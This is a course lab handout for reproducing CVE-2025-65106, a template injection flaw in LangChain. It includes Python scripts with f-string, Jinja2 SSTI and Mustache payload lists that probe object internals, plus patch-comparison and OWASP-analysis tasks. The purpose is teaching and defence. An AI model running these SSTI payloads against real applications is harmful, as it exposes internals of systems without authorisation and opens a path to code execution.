Lab 8: CVE-2025-65106 Reproduction -- LangChain Jinja2 SSTI · AI-101

Module: 8 (CVE Deep Dive)
Duration: 4 hours
Substrate: Local Python (isolated venv required)
CVE: CVE-2025-65106, GHSA-6qv9-48xg-fc7f
Points: 12

Objectives

Set up isolated vulnerable (1.0.6) and patched (1.0.7) LangChain environments
Reproduce the f-string template injection vulnerability
Reproduce the Jinja2 SSTI vulnerability
Read and understand the patch diff
Write the OWASP mapping analysis (graded written component)

Setup: Isolated Vulnerable Environment

SAFETY NOTE: This lab installs a known-vulnerable version of LangChain in an isolated virtualenv. Never install vulnerable packages in your production environment or alongside other projects.

# Create isolated vulnerable environment
python3 -m venv /tmp/vuln-langchain
source /tmp/vuln-langchain/bin/activate

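# Install the vulnerable version
# (jinja2 is listed explicitly: Part 2 needs it, and it may not be pulled in as a dependency)
pip install "langchain-core==1.0.6" "langchain==1.0.6" openai jinja2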

# Verify version
python3 -c "import langchain_core; print(langchain_core.__version__)"
# Must print: 1.0.6

echo "Vulnerable environment ready"
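
Before running any payloads, it can help to confirm from inside Python that the interpreter really is the isolated one. The following is a minimal sketch using only the standard library; the helper names `in_virtualenv` and `installed_version` are illustrative and not part of LangChain.

```python
import sys
from importlib import metadata
from typing import Optional


def in_virtualenv() -> bool:
    """True when the running interpreter belongs to a venv."""
    # Inside a venv, sys.prefix points at the venv directory while
    # sys.base_prefix still points at the base Python installation.
    return sys.prefix != sys.base_prefix


def installed_version(package: str) -> Optional[str]:
    """Return the installed version of a distribution, or None if absent."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    print("Interpreter:", sys.executable)
    print("Inside a venv:", in_virtualenv())
    print("langchain-core:", installed_version("langchain-core"))
```

If "Inside a venv" prints False, stop and re-run the `source .../bin/activate` step before installing anything.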

Part 1: F-String Template Injection (60 min)

Understand the vulnerable code path first:

# With the vulnerable venv active:
from langchain_core.prompts import PromptTemplate

# The intended use: user supplies variable VALUES, not template strings
safe_template = PromptTemplate(
    input_variables=["topic"],
    template="Tell me about {topic}."
)
result = safe_template.format(topic="cybersecurity")
print("Safe:", result)

The attack surface opens when the application accepts user-supplied template strings:

# VULNERABLE PATTERN: user controls the template string itself
# This is the CVE-2025-65106 attack surface

def vulnerable_generate_prompt(user_template_string: str, topic: str) -> str:
    """Accepts user-supplied template string -- this is the vulnerable pattern."""
    pt = PromptTemplate(
        input_variables=["topic"],
        template=user_template_string,
        template_format="f_string"
    )
    return pt.format(topic=topic)

# Legitimate use
normal = vulnerable_generate_prompt("Tell me about {topic}.", "Python security")
print("Normal:", normal)
print()

# Attack: the "f_string" format follows str.format() syntax, which resolves
# {variable.attribute} and {variable[index]} lookups but cannot call methods.
# The 'topic' variable is a Python string object with attributes
attack_payloads_fstring = [
    "{topic.__class__}",                           # reveals <class 'str'>
    "{topic.__class__.__mro__}",                   # reveals class hierarchy
    "{topic.__class__.__mro__[1].__subclasses__()[:5]}",  # tries to list subclasses; "()" is not call syntax here, so expect an error
]

print("=== F-STRING ATTACK RESULTS ===")
for payload in attack_payloads_fstring:
    try:
        result = vulnerable_generate_prompt(payload, "test_input")
        print(f"Payload: {payload}")
        print(f"Result: {result[:200]}")
        print(f"Exposes internals: {'<class' in result}")
        print()
    except Exception as e:
        print(f"Payload: {payload}")
        print(f"Error: {type(e).__name__}: {e}")
        print()

Record:

What did {topic.__class__} return?
What did {topic.__class__.__mro__} reveal?
Did the third payload list any subclasses, or did it raise an error? If it raised, why?
Does any of this output contain information that would be dangerous in a production application?
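
The behaviour observed in Part 1 comes from Python's own format-string machinery rather than anything LangChain-specific. The sketch below reproduces it with the standard library alone: attribute lookups inside a replacement field are resolved, the raw field name can be inspected with `string.Formatter().parse()`, and call syntax is not supported.

```python
from string import Formatter

topic = "test_input"

# Attribute lookups inside a replacement field are resolved by str.format().
leak = "{topic.__class__}".format(topic=topic)
print(leak)

# Formatter().parse() exposes the raw field name, dots and all, so a
# validator can inspect it before any formatting happens.
fields = [
    name
    for _, name, _, _ in Formatter().parse("Hi {topic.__class__.__mro__}")
    if name
]
print(fields)

# Call syntax is not supported: "__subclasses__()" is looked up as a literal
# attribute name, which does not exist on the class.
try:
    "{topic.__class__.__mro__[1].__subclasses__()}".format(topic=topic)
    call_error = None
except AttributeError as exc:
    call_error = exc
print("Call attempt raised:", type(call_error).__name__)
```

This is why format-string injection is usually an information-disclosure problem: it can walk attributes and indexes on whatever objects the application passes in, but it cannot invoke them.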

Part 2: Jinja2 SSTI (60 min)

# Jinja2 format is more powerful -- it has its own expression language
def vulnerable_jinja2_prompt(user_template_string: str, topic: str) -> str:
    """Accepts user-supplied Jinja2 template string."""
    from langchain_core.prompts import PromptTemplate
    pt = PromptTemplate(
        input_variables=["topic"],
        template=user_template_string,
        template_format="jinja2"
    )
    return pt.format(topic=topic)

# Standard Jinja2 SSTI gadgets
jinja2_payloads = [
    # Object hierarchy traversal
    "{{ ''.__class__ }}",
    "{{ ''.__class__.__mro__ }}",
    "{{ ''.__class__.__mro__[1].__subclasses__() }}",

    # Flask-style global; expect empty output unless the application passes a 'config' variable
    "{{ config }}",

    # Attribute traversal starting from the supplied variable
    # (read-only probe, not RCE)
    "{{ topic.__class__.__name__ }}",
]

print("=== JINJA2 SSTI RESULTS ===")
for payload in jinja2_payloads:
    try:
        result = vulnerable_jinja2_prompt(payload, "security_test")
        print(f"Payload: {payload}")
        print(f"Result preview: {str(result)[:300]}")
        print(f"Exposes internals: {any(x in str(result) for x in ['<class', '__class__', 'mro', 'object at'])}")
        print()
    except Exception as e:
        print(f"Payload: {payload}")
        print(f"Error: {type(e).__name__}: {str(e)[:200]}")
        print()
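
When interpreting the Jinja2 results, it is worth knowing that Jinja2 itself ships a `SandboxedEnvironment` that refuses underscore-prefixed attributes. Whether the vulnerable LangChain build already renders through it is an assumption to verify in Part 4; if it does, the dunder payloads may come back empty or raise instead of leaking. The sketch below compares a plain and a sandboxed environment directly. The `probe` helper is hypothetical, and the import is guarded so the script still runs where jinja2 is missing.

```python
try:
    from jinja2 import Environment
    from jinja2.sandbox import SandboxedEnvironment
except ImportError:  # jinja2 is absent outside the lab venv
    Environment = SandboxedEnvironment = None


def probe(env_cls, template: str, **context) -> str:
    """Render a template and report either the output or the exception type."""
    if env_cls is None:
        return "unavailable: jinja2 not installed"
    try:
        rendered = env_cls().from_string(template).render(**context)
        return "rendered: " + repr(rendered)
    except Exception as exc:
        return f"raised: {type(exc).__name__}"


payload = "{{ topic.__class__ }}"
plain = probe(Environment, payload, topic="x")
sandboxed = probe(SandboxedEnvironment, payload, topic="x")
print("plain    :", plain)
print("sandboxed:", sandboxed)
```

A sandbox that only filters underscore-prefixed names still allows ordinary attributes and methods on any object passed into the template, so try a payload without dunders as well when comparing versions.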

Compare to Mustache format:

def vulnerable_mustache_prompt(user_template_string: str, **kwargs) -> str:
    from langchain_core.prompts import PromptTemplate
    pt = PromptTemplate.from_template(user_template_string, template_format="mustache")
    return pt.format(**kwargs)

# Mustache uses {{variable}} and allows attribute traversal via getattr()
mustache_payloads = [
    "{{topic.__class__}}",
    "{{topic.__class__.__name__}}",
]

print("=== MUSTACHE ATTACK RESULTS ===")
for payload in mustache_payloads:
    try:
        result = vulnerable_mustache_prompt(payload, topic="test")
        print(f"Payload: {payload} -> Result: {str(result)[:200]}")
    except Exception as e:
        print(f"Payload: {payload} -> Error: {type(e).__name__}: {str(e)[:100]}")

Record:

Did Jinja2 SSTI expose the class hierarchy?
Did {{ config }} return anything?
Which format (f-string, jinja2, mustache) had the most severe exposure?
What is the security difference between reading class metadata (what we did) vs. calling os.system() (what a real attacker would do)?
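
To make the Mustache comparison concrete, the sketch below contrasts two ways of resolving a dotted name such as `topic.__class__.__name__`. Both resolvers are hypothetical simplifications written for this lab, not LangChain's implementation: one falls back to `getattr()` on any object, the other walks only plain containers.

```python
from typing import Any


def resolve_permissive(name: str, scope: dict) -> Any:
    """Hypothetical resolver: falls back to getattr() on any object."""
    current: Any = scope
    for part in name.split("."):
        if isinstance(current, dict):
            current = current.get(part, "")
        else:
            current = getattr(current, part, "")
    return current


def resolve_restricted(name: str, scope: dict) -> Any:
    """Hypothetical hardened resolver: traverses plain containers only."""
    current: Any = scope
    for part in name.split("."):
        if isinstance(current, dict):
            current = current.get(part, "")
        elif (
            isinstance(current, (list, tuple))
            and part.isdecimal()
            and int(part) < len(current)
        ):
            current = current[int(part)]
        else:
            return ""  # never reach into arbitrary object attributes
    return current


scope = {"topic": "test", "user": {"name": "ada"}}
print(repr(resolve_permissive("topic.__class__.__name__", scope)))
print(repr(resolve_restricted("topic.__class__.__name__", scope)))
print(repr(resolve_restricted("user.name", scope)))
```

The restricted version still supports the legitimate case (nested dictionaries) while returning an empty string for anything that would require attribute access.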

Part 3: Apply the Patch (30 min)

# Deactivate the vulnerable environment
deactivate

# Create patched environment
python3 -m venv /tmp/patched-langchain
source /tmp/patched-langchain/bin/activate

# jinja2 is listed explicitly so the Jinja2 test case can run
pip install "langchain-core==1.0.7" "langchain==1.0.7" openai jinja2

python3 -c "import langchain_core; print('Version:', langchain_core.__version__)"
# Must print: 1.0.7

# Run the same payloads against the patched version
from langchain_core.prompts import PromptTemplate

def patched_prompt(template_str: str, template_format: str, **kwargs) -> str:
    try:
        pt = PromptTemplate(
            input_variables=list(kwargs.keys()),
            template=template_str,
            template_format=template_format
        )
        return pt.format(**kwargs)
    except Exception as e:
        return f"BLOCKED: {type(e).__name__}: {str(e)[:200]}"

print("=== PATCHED VERSION RESULTS ===")
test_cases = [
    ("f_string", "{topic.__class__.__mro__}", {"topic": "test"}),
    ("jinja2", "{{ ''.__class__.__mro__ }}", {"topic": "test"}),
    ("mustache", "{{topic.__class__}}", {"topic": "test"}),
]

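for fmt, payload, kwargs in test_cases:
    result = patched_prompt(payload, fmt, **kwargs)
    # A format can neutralize a payload without raising (for example by
    # rendering nothing), so track exceptions and leaks separately.
    raised = result.startswith("BLOCKED")
    leaked = "<class" in result
    print(f"Format: {fmt}")
    print(f"Payload: {payload}")
    print(f"Result: {result[:200]}")
    print(f"Raised: {raised}  Leaked: {leaked}  Blocked: {not leaked}")
    print()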

Record:

Were all three format attacks blocked by the patch?
What error type, if any, did the patched version raise for each format?
Does the patch break legitimate template use? (Test: patched_prompt("{topic}", "f_string", topic="cybersecurity"))
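
Because the vulnerable and patched runs happen in different virtualenvs, one way to compare them is to save each run's outputs to a file and diff the two afterwards. The sketch below uses only the standard library; `save_results` and `changed_payloads` are hypothetical helper names, and the sample data is made up for illustration.

```python
import json
import tempfile
from pathlib import Path


def save_results(label: str, results: dict, directory: Path) -> Path:
    """Write {payload: output} pairs to <directory>/<label>.json."""
    path = directory / f"{label}.json"
    path.write_text(json.dumps(results, indent=2, sort_keys=True), encoding="utf-8")
    return path


def changed_payloads(before: Path, after: Path) -> dict:
    """Return payloads whose output differs between two saved runs."""
    old = json.loads(before.read_text(encoding="utf-8"))
    new = json.loads(after.read_text(encoding="utf-8"))
    return {
        payload: (old.get(payload), new.get(payload))
        for payload in sorted(set(old) | set(new))
        if old.get(payload) != new.get(payload)
    }


# Illustrative data only; in the lab, fill these dicts from your own runs.
with tempfile.TemporaryDirectory() as tmp:
    out_dir = Path(tmp)
    a = save_results("vulnerable", {"{topic}": "test", "{topic.__class__}": "<class 'str'>"}, out_dir)
    b = save_results("patched", {"{topic}": "test", "{topic.__class__}": "BLOCKED"}, out_dir)
    diff = changed_payloads(a, b)

for payload, (old_out, new_out) in diff.items():
    print(f"{payload}: {old_out!r} -> {new_out!r}")
```

Payloads that do not appear in the diff behaved identically in both versions, which is also the quickest check that legitimate templates were not broken.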

Part 4: Read the Patch Diff (30 min)

Download and examine the patch:

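# Optional: diffing locally needs the git CLI from your OS package manager
# (for example `apt install git` or `brew install git`). Note that
# `pip install gitpython` installs only a Python wrapper, not git itself.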

# Or just browse on GitHub:
# https://github.com/langchain-ai/langchain/compare/langchain-core==1.0.6...langchain-core==1.0.7

# Alternatively, examine the patched source directly:
import inspect
from pathlib import Path

import langchain_core

# The fix may span several modules, so scan the whole installed package
# rather than assuming everything lives in prompts/prompt.py
package_dir = Path(inspect.getfile(langchain_core)).parent
print(f"Scanning: {package_dir}")

# Matches _RestrictedSandboxedEnvironment and related names
keywords = ["sandbox", "restricted", "validate_var"]
for path in sorted(package_dir.rglob("*.py")):
    lines = path.read_text(encoding="utf-8").splitlines()
    for i, line in enumerate(lines, start=1):
        if any(word in line.lower() for word in keywords):
            print(f"{path.relative_to(package_dir)}:{i}: {line.strip()}")

Record:

What class or function implements the Jinja2 sandboxing in the patched version?
Find the f-string variable name validation. What regex or check is used?
Find the Mustache fix. What type checking is applied?
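
As a reference point while reading the diff, the sketch below shows one way a variable-name check for format-string templates could be written. It is an illustration under stated assumptions, not the check LangChain ships: `unsafe_fields` is a hypothetical name, and the rule used here (only bare identifiers are allowed) is just one reasonable policy.

```python
from string import Formatter
from typing import List


def unsafe_fields(template: str) -> List[str]:
    """Return replacement-field names that are not plain identifiers."""
    flagged = []
    for _, field_name, _, _ in Formatter().parse(template):
        if field_name is None:
            continue  # this chunk is literal text only
        # Dots and brackets mean attribute or index traversal; an empty or
        # numeric name means positional lookup. Only bare identifiers pass.
        # Nested fields inside a format spec are not inspected by this sketch.
        if not field_name.isidentifier():
            flagged.append(field_name)
    return flagged


print(unsafe_fields("Tell me about {topic}."))
print(unsafe_fields("{topic.__class__.__mro__[1]} and {0}"))
```

Compare this with what you find in the patched source: note whether the real check is a regex, an identifier test, or something else, and which cases it covers that this sketch does not.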

Part 5: Written OWASP Mapping (45 min -- graded)

Write a 3-paragraph analysis (300-500 words total) that addresses:

Paragraph 1: Root Cause and LLM05 Mapping
Map CVE-2025-65106 to LLM05:2025 (Improper Output Handling). Explain specifically how template processing, which stands in for "output" here, handled untrusted input without sanitization. Cite the specific vulnerable code behavior.

Paragraph 2: LLM03 Supply Chain Angle
Explain why this CVE is also a supply chain issue (LLM03:2025). What was the trust relationship between LangChain and the applications that used it? Who was responsible for the vulnerability? Who was responsible for deploying the fix?

Paragraph 3: Real-World Risk and Remediation
Describe a realistic production scenario in which CVE-2025-65106 would be exploited. What data would be at risk? What is the remediation for applications that cannot immediately upgrade?
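
For the remediation question, one common mitigation pattern is to stop accepting template text from users at all and let them choose among developer-authored templates by ID. The sketch below illustrates that idea with plain `str.format`; the catalogue contents and the `render_approved` helper are hypothetical.

```python
# Hypothetical catalogue: templates are authored by developers and selected
# by ID, so users supply only variable values, never template text.
APPROVED_TEMPLATES = {
    "explain": "Tell me about {topic}.",
    "summarize": "Summarize the key risks of {topic} in three bullets.",
}


def render_approved(template_id: str, topic: str) -> str:
    """Render a developer-owned template with a user-supplied value."""
    try:
        template = APPROVED_TEMPLATES[template_id]
    except KeyError:
        raise ValueError(f"unknown template id: {template_id!r}") from None
    # The value is inserted as data; braces inside it are not re-interpreted.
    return template.format(topic=str(topic))


print(render_approved("explain", "cybersecurity"))
print(render_approved("explain", "{topic.__class__}"))
```

The second call shows the payload passing through as inert text, because it arrives as a value rather than as the template. Your analysis should weigh this kind of design change against input filtering, which tends to be easier to bypass.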

Save your analysis as lab-8-owasp-analysis.md in your submission.

Cleanup

deactivate
rm -rf /tmp/vuln-langchain /tmp/patched-langchain

Lab Report

Your lab report for this lab is the OWASP mapping analysis from Part 5. Submit lab-8-owasp-analysis.md alongside your lab notes.

Grading (12 points)

Item	Points
Part 1: f-string injection reproduced; 4 record questions answered	2
Part 2: Jinja2 SSTI reproduced; format comparison documented	2
Part 3: patch applied; all 3 formats confirmed blocked	2
Part 4: patch diff read; 3 fix locations identified	2
Part 5: OWASP mapping analysis (3 paragraphs, 300-500 words, substantive)	4